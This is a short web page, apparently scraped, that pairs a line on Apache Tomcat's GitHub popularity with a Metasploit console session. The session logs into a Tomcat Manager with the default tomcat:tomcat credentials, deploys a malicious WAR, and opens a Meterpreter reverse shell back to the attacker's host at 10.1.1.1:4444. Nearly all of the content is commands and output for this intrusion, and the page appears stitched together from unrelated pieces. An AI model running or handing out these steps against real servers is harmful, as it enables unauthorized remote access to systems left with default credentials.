12/13/2021, Monday

Apache Tomcat Github

Apache Tomcat Manager Common Administrative Credentials
  • Apache Tomcat is an open source tool with 5.3K GitHub stars and 3.6K GitHub forks. Here’s a link to Apache Tomcat's open source repository on GitHub.


msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > setg RHOSTS 10.1.1.130
RHOSTS => 10.1.1.130
msf auxiliary(tomcat_mgr_login) > exploit
...........
............
.............
msf auxiliary(tomcat_mgr_login) > creds
Credentials
host        port  user    pass    type      active?
----        ----  ----    ----    ----      -------
10.1.1.130  8180  tomcat  tomcat  password  true
[*] Found 1 credential.
msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target 'Linux x86'
[*] Uploading 6459 bytes as bWFwnoBbIedec7kyEOzZ.war ...
[*] Executing /bWFwnoBbIedec7kyEOzZ/5f0tDtPEV9UXyAkQ6uP.jsp...
[*] Undeploying bWFwnoBbIedec7kyEOzZ ...
[*] Sending stage (30216 bytes) to 10.1.1.130
[*] Meterpreter session 2 opened (10.1.1.1:4444 -> 10.1.1.130:48633) at 2012-08-28 14:11:29 +0800
meterpreter > getuid
Server username: tomcat55
....Not root, moving on
